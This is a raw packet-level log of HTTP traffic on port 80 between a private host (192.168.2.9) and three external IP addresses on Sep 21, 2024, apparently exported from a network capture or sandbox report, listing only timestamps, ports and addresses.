Sep 21, 2024 14:48:09.209131002 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.213416100 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.248594999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.248665094 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.249331951 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.254106045 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.295002937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295021057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295032978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295048952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295068026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295078993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295085907 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295089960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295120955 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295156956 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295185089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295226097 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295274019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295284986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295296907 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295311928 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295330048 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295363903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295416117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295427084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295439959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295458078 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295485020 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295504093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295514107 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295527935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295550108 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295607090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295635939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295646906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295685053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295763969 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295783997 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295795918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295805931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295806885 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295819044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295830965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.295850992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.295880079 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296047926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296058893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296073914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296086073 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296087027 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296107054 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296135902 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296240091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296251059 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296262026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296273947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296276093 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296300888 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296327114 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296452999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296463966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296474934 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296487093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296492100 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296499014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296518087 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296545029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296715975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296736002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296747923 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296757936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296760082 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296771049 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296782970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296787024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296796083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296808004 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296818972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296830893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.296899080 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.296899080 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297231913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297243118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297254086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297266006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297276974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297280073 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297288895 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297301054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297312021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297312975 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297323942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297336102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297353983 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297375917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297749996 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297761917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297772884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297784090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297796011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297801971 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297806025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297817945 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297827005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297831059 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297843933 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297846079 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297858000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.297867060 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297888994 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.297910929 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.299885035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.299907923 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.299918890 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.299930096 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.299954891 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.299969912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.299983025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300013065 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300040007 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300088882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300101042 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300112009 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300122976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300124884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300138950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300149918 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300190926 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300308943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300321102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300333023 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300343990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300347090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300358057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.300364017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.300394058 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386094093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386120081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386131048 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386138916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386189938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386203051 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386236906 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386275053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386306047 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386318922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386331081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386389971 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386389971 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386409998 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386475086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386493921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386506081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386516094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386547089 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386570930 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386670113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386682034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386693001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386704922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386714935 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386718035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386734009 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386907101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386918068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386934042 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386934042 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386948109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386960030 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.386960983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.386975050 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387006044 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387193918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387206078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387217999 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387231112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387242079 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387254000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387264967 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387264967 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387279034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387291908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387319088 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387523890 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387536049 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387547016 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387558937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387571096 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387582064 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387582064 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387598038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387628078 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387660980 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387672901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387684107 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387696981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387707949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387711048 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387720108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387732029 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387732029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387743950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387756109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387764931 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387767076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387779951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.387794971 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387815952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.387840986 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388499022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388510942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388520002 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388530970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388541937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388551950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388561010 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388566017 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388576984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388586998 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388592005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388597965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388609886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388617992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388622046 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388632059 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388634920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388647079 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388657093 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388658047 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388669014 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388679981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388685942 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388690948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388703108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.388708115 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388729095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.388748884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389476061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389488935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389498949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389509916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389520884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389533043 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389538050 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389544964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389555931 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389565945 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389566898 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389579058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389589071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389590979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389604092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389606953 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389615059 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389626026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389633894 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389637947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389650106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389659882 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389661074 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389672995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389684916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389688969 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389694929 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.389699936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389715910 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.389750004 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390378952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390393019 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390403032 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390419960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390430927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390436888 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390445948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390454054 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390459061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390470028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390480042 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390489101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390491009 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390501976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390512943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390522957 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390525103 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390537024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390537024 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390549898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390561104 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390563011 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390572071 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390583992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390590906 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390594959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.390609980 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.390644073 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.391160965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.391180992 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.391252041 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.391463041 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.391463041 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.396224976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432369947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432483912 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.432496071 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432507992 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432518005 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432528973 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432539940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.432559013 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432569981 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432574034 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.432580948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.432621956 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.433151007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.433201075 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.433223009 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.433233976 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.433264017 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.433269978 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.433307886 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.443238020 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443284988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443317890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443353891 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.443411112 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.443422079 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443433046 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443444014 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443485022 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.443553925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.443562984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.443564892 CEST	80	49713	176.113.115.33	192.168.2.9
